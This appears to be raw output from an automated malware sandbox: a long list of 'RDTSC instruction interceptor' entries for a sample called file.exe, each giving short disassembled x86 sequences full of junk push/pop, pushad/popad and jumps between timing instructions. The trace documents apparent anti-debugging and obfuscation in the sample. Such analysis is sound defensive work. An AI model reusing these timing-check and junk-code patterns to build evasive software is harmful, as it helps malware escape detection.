Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6D1 second address: ADD6EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DFh 0x00000007 jo 00007FDE8C51D4DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6EA second address: ADD6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6F5 second address: ADD6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6FC second address: ADD701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD701 second address: ADD710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FDE8C51D4D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDA24 second address: ADDA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDA2A second address: ADDA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FDE8C51D4EBh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FDE8C51D4E3h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007FDE8C51D4D6h 0x0000001c jp 00007FDE8C51D4D6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDA5A second address: ADDA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDA5E second address: ADDA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDA6A second address: ADDA80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jno 00007FDE8CE8B4C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE2A7 second address: ADE2BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDE8C51D4DAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE2BF second address: ADE2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE844 second address: ADE848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE848 second address: ADE863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE8CE8B4CFh 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9168 second address: AE9184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9184 second address: AE9188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE92F6 second address: AE92FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE96D6 second address: AE96DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE96DC second address: AE96EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FDE8C51D4DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE982E second address: AE9832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9832 second address: AE985D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E3h 0x00000007 jmp 00007FDE8C51D4E4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE985D second address: AE9871 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jl 00007FDE8CE8B4CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9871 second address: AE98F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FDE8C51D4DCh 0x0000000c pushad 0x0000000d jmp 00007FDE8C51D4E5h 0x00000012 jmp 00007FDE8C51D4E2h 0x00000017 popad 0x00000018 push esi 0x00000019 jmp 00007FDE8C51D4E0h 0x0000001e jmp 00007FDE8C51D4E9h 0x00000023 pop esi 0x00000024 pushad 0x00000025 js 00007FDE8C51D4D6h 0x0000002b push eax 0x0000002c pop eax 0x0000002d jmp 00007FDE8C51D4E4h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF23C0 second address: AF23D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FDE8CE8B4C6h 0x0000000d jmp 00007FDE8CE8B4CAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF0657 second address: AF065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF065B second address: AF068A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8CE8B4D2h 0x0000000b jmp 00007FDE8CE8B4CDh 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FDE8CE8B4C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF068A second address: AF068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1073 second address: AF1087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop esi 0x00000008 jbe 00007FDE8CE8B4EDh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1087 second address: AF108B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF11F4 second address: AF11FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF137E second address: AF13C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FDE8C51D4E7h 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007FDE8C51D4D6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007FDE8C51D4DCh 0x0000001e jo 00007FDE8C51D4D6h 0x00000024 je 00007FDE8C51D4D6h 0x0000002a popad 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF89A8 second address: AF89AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF8370 second address: AF8374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF8374 second address: AF83B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CEh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FDE8CE8B4CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FDE8CE8B4CEh 0x00000018 jl 00007FDE8CE8B4C6h 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007FDE8CE8B4CCh 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF852E second address: AF8552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDE8C51D4E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B059F4 second address: B059F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B05B91 second address: B05BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007FDE8C51D4D6h 0x0000000e jmp 00007FDE8C51D4E6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B05BB8 second address: B05BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B05BC0 second address: B05BFC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDE8C51D4D6h 0x00000008 jbe 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007FDE8C51D4E2h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push edi 0x0000001a push eax 0x0000001b pop eax 0x0000001c pop edi 0x0000001d jmp 00007FDE8C51D4DAh 0x00000022 push edx 0x00000023 jng 00007FDE8C51D4D6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A09B second address: B0A0A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A0A4 second address: B0A0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDE8C51D4D6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A0AF second address: B0A0BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09C80 second address: B09C87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09DB6 second address: B09DD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D7h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B485 second address: B1B48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B48B second address: B1B48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B48F second address: B1B493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B493 second address: B1B499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B499 second address: B1B4B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B4B6 second address: B1B4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B4BA second address: B1B4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B21AC6 second address: B21ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B202E8 second address: B202EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B205D8 second address: B205DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B205DC second address: B205F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jne 00007FDE8C51D4D6h 0x0000000d js 00007FDE8C51D4D6h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B20A5B second address: B20A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B20BAF second address: B20BBB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 je 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24254 second address: B24258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B32907 second address: B3291C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3291C second address: B32922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B32922 second address: B3293B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jl 00007FDE8C51D4DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B41767 second address: B4176F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4176F second address: B41773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43013 second address: B43018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43018 second address: B43046 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007FDE8C51D4D6h 0x00000009 jmp 00007FDE8C51D4DBh 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FDE8C51D4E5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B42EEF second address: B42EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B448A6 second address: B448B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B448B0 second address: B448B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B448B6 second address: B448D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E1h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45EBF second address: B45EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45EC3 second address: B45EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45EC7 second address: B45ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FDE8CE8B4D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47E3A second address: B47E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47E3E second address: B47E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDE8CE8B4D8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47E71 second address: B47E9A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDE8C51D4D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FDE8C51D4F3h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDE8C51D4E3h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61352 second address: B61358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61358 second address: B6136C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDE8C51D4DCh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60875 second address: B60894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007FDE8CE8B4C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60894 second address: B608AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b push ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e js 00007FDE8C51D4D6h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B608AD second address: B608B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B608B1 second address: B608B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B608B5 second address: B608BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60B7B second address: B60B8E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8C51D4DCh 0x00000008 jp 00007FDE8C51D4D6h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60F54 second address: B60F5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60F5A second address: B60F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6108B second address: B61091 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B629CF second address: B629DB instructions: 0x00000000 rdtsc 0x00000002 js 00007FDE8C51D4DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6538D second address: B65397 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8CE8B4CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6564C second address: B65650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B65650 second address: B656A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDE8CE8B4CDh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FDE8CE8B4C8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dword ptr [ebp+1244EF50h], edi 0x00000030 push 00000004h 0x00000032 mov dh, 40h 0x00000034 mov dh, bh 0x00000036 call 00007FDE8CE8B4C9h 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e push edx 0x0000003f pop edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B656A7 second address: B656AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B656AB second address: B656DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007FDE8CE8B4CFh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FDE8CE8B4D1h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B656DD second address: B6570D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FDE8C51D4DFh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDE8C51D4E1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67360 second address: B67364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66E31 second address: B66E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDE8C51D4D6h 0x0000000a jmp 00007FDE8C51D4DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66E49 second address: B66E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
